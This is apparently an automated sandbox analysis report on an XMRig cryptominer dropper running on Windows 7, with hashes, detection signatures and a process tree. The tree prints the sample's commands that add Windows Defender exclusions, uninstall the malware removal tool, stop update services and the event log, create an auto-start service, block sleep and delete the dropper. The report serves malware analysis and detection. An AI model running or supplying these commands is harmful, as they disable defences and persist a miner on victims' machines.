Analysis
-
max time kernel
91s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-12-2024 08:34
Static task
static1
Behavioral task
behavioral1
Sample
4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe
Resource
win7-20240903-en
General
-
Target
4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe
-
Size
5.6MB
-
MD5
2bd3a66d7d0cb47d90ee7107a8c80ac0
-
SHA1
e53b499eea45efc7965c08412c838555ab280aad
-
SHA256
4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9ba
-
SHA512
d71870806c41a9c514104951b563055b0d7f1d18129c988d2c5b0cf2b8df6892c13d368cc2663af7b9efc3ea73bde9ee5872f06483da535d7f39b8c94b91f6be
-
SSDEEP
98304:xRjPz9KDzUU8O5/B/LJ25E9SVh86sS3TRknQ3ss2MApp9meypA3cPDu7:xFKoU8O5/b2XViSjX310SeyGc7u7
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/2420-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2420-34-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2420-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2420-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2420-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2420-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2420-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2420-41-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2800 powershell.exe 1872 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
pid Process 1880 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 476 Process not Found 1604 lutlgidagtja.exe -
Loads dropped DLL 1 IoCs
pid Process 476 Process not Found -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2620 powercfg.exe 2628 powercfg.exe 3032 powercfg.exe 2408 powercfg.exe 2092 powercfg.exe 2268 powercfg.exe 2780 powercfg.exe 2612 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe lutlgidagtja.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1604 set thread context of 2100 1604 lutlgidagtja.exe 86 PID 1604 set thread context of 2420 1604 lutlgidagtja.exe 90 -
resource yara_rule behavioral1/memory/2420-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-34-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-40-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2420-41-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2896 sc.exe 2956 sc.exe 1960 sc.exe 2864 sc.exe 2652 sc.exe 1548 sc.exe 2036 sc.exe 1760 sc.exe 768 sc.exe 1888 sc.exe 1336 sc.exe 3060 sc.exe 2772 sc.exe 1508 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0bf4d6c4c54db01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1872 powershell.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1416 4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe 1604 lutlgidagtja.exe 2800 powershell.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 1604 lutlgidagtja.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe 2420 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 1872 powershell.exe Token: SeShutdownPrivilege 2612 powercfg.exe Token: SeShutdownPrivilege 2780 powercfg.exe Token: SeShutdownPrivilege 2620 powercfg.exe Token: SeShutdownPrivilege 2628 powercfg.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeShutdownPrivilege 2092 powercfg.exe Token: SeShutdownPrivilege 3032 powercfg.exe Token: SeShutdownPrivilege 2408 powercfg.exe Token: SeShutdownPrivilege 2268 powercfg.exe Token: SeLockMemoryPrivilege 2420 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2876 wrote to memory of 2616 2876 cmd.exe 39 PID 2876 wrote to memory of 2616 2876 cmd.exe 39 PID 2876 wrote to memory of 2616 2876 cmd.exe 39 PID 1880 wrote to memory of 2796 1880 cmd.exe 64 PID 1880 wrote to memory of 2796 1880 cmd.exe 64 PID 1880 wrote to memory of 2796 1880 cmd.exe 64 PID 1500 wrote to memory of 2996 1500 cmd.exe 74 PID 1500 wrote to memory of 2996 1500 cmd.exe 74 PID 1500 wrote to memory of 2996 1500 cmd.exe 74 PID 1604 wrote to memory of 2100 1604 lutlgidagtja.exe 86 PID 1604 wrote to memory of 2100 1604 lutlgidagtja.exe 86 PID 1604 wrote to memory of 2100 1604 lutlgidagtja.exe 86 PID 1604 wrote to memory of 2100 1604 lutlgidagtja.exe 86 PID 1604 wrote to memory of 2100 1604 lutlgidagtja.exe 86 PID 1604 wrote to memory of 2100 1604 lutlgidagtja.exe 86 PID 1604 wrote to memory of 2100 1604 lutlgidagtja.exe 86 PID 1604 wrote to memory of 2100 1604 lutlgidagtja.exe 86 PID 1604 wrote to memory of 2100 1604 lutlgidagtja.exe 86 PID 1604 wrote to memory of 2420 1604 lutlgidagtja.exe 90 PID 1604 wrote to memory of 2420 1604 lutlgidagtja.exe 90 PID 1604 wrote to memory of 2420 1604 lutlgidagtja.exe 90 PID 1604 wrote to memory of 2420 1604 lutlgidagtja.exe 90 PID 1604 wrote to memory of 2420 1604 lutlgidagtja.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe"C:\Users\Admin\AppData\Local\Temp\4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1416 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2616
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2864
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3060
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2896
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2956
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2772
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JIOGRCSG"2⤵
- Launches sc.exe
PID:2652
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JIOGRCSG" binpath= "C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe" start= "auto"2⤵
- Launches sc.exe
PID:1888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JIOGRCSG"2⤵
- Launches sc.exe
PID:1548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\4da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9baN.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2796
-
-
-
C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exeC:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2996
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1508
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2036
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1336
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:768
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2100
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD52bd3a66d7d0cb47d90ee7107a8c80ac0
SHA1e53b499eea45efc7965c08412c838555ab280aad
SHA2564da76fac218ef73b5cb327ca725859857ebc9ca22ec1d678e6a782e8db95e9ba
SHA512d71870806c41a9c514104951b563055b0d7f1d18129c988d2c5b0cf2b8df6892c13d368cc2663af7b9efc3ea73bde9ee5872f06483da535d7f39b8c94b91f6be